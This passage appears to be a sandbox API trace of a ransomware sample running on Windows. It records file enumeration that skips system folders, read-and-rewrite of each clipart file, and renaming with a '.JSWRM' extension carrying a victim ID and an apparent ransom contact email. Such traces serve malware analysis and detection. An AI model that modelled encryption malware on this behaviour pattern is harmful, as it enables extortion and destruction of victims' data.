dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105380.WMF", cAlternateFileName="")) returned 1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2=".") returned 1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="..") returned 1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="...") returned 1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="windows") returned -1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="recovery") returned -1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="perflogs") returned -1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="documents and settings") returned 1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="system volume information") returned -1 [0081.073] lstrcmpiW (lpString1="J0105380.WMF", lpString2="msocache") returned -1 [0081.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0081.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105380.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105380.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105380.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0081.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105380.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105380.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105380.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.075] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4624) returned 1 [0081.075] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1210) returned 0x205850 [0081.075] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1210, lpOverlapped=0x0) returned 1 [0081.076] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.076] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1210, lpOverlapped=0x0) returned 1 [0081.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.077] CloseHandle (hObject=0x314) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0081.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0081.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0081.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0081.077] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0081.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0081.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.077] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0081.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.078] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105384.WMF", cAlternateFileName="")) returned 1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2=".") returned 1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="..") returned 1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="...") returned 1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="windows") returned -1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="recovery") returned -1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="perflogs") returned -1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="documents and settings") returned 1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="system volume information") returned -1 [0081.078] lstrcmpiW (lpString1="J0105384.WMF", lpString2="msocache") returned -1 [0081.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105384.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105384.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105384.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0081.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105384.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105384.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105384.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0081.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0081.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.079] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5880) returned 1 [0081.079] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16f0) returned 0x205850 [0081.079] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16f0, lpOverlapped=0x0) returned 1 [0081.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.080] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16f0, lpOverlapped=0x0) returned 1 [0081.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.081] CloseHandle (hObject=0x314) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0081.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0081.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0081.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0081.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0081.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0081.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0081.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0081.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0081.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.082] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x175c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105386.WMF", cAlternateFileName="")) returned 1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2=".") returned 1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="..") returned 1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="...") returned 1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="windows") returned -1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="recovery") returned -1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="perflogs") returned -1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="documents and settings") returned 1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="system volume information") returned -1 [0081.082] lstrcmpiW (lpString1="J0105386.WMF", lpString2="msocache") returned -1 [0081.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105386.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105386.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105386.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105386.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105386.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105386.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.082] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.082] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0081.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.083] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5980) returned 1 [0081.083] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.083] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1750) returned 0x205850 [0081.083] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1750, lpOverlapped=0x0) returned 1 [0081.166] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.181] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1750, lpOverlapped=0x0) returned 1 [0081.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.181] CloseHandle (hObject=0x314) returned 1 [0081.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0081.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0081.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0081.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0081.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0081.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0081.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.182] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0081.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0081.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0081.183] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe651537, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe651537, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x203c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105388.WMF", cAlternateFileName="")) returned 1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2=".") returned 1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="..") returned 1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="...") returned 1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="windows") returned -1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="recovery") returned -1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="perflogs") returned -1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="documents and settings") returned 1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="system volume information") returned -1 [0081.183] lstrcmpiW (lpString1="J0105388.WMF", lpString2="msocache") returned -1 [0081.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105388.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105388.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105388.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0081.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105388.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105388.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105388.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.183] HeapFree (in: 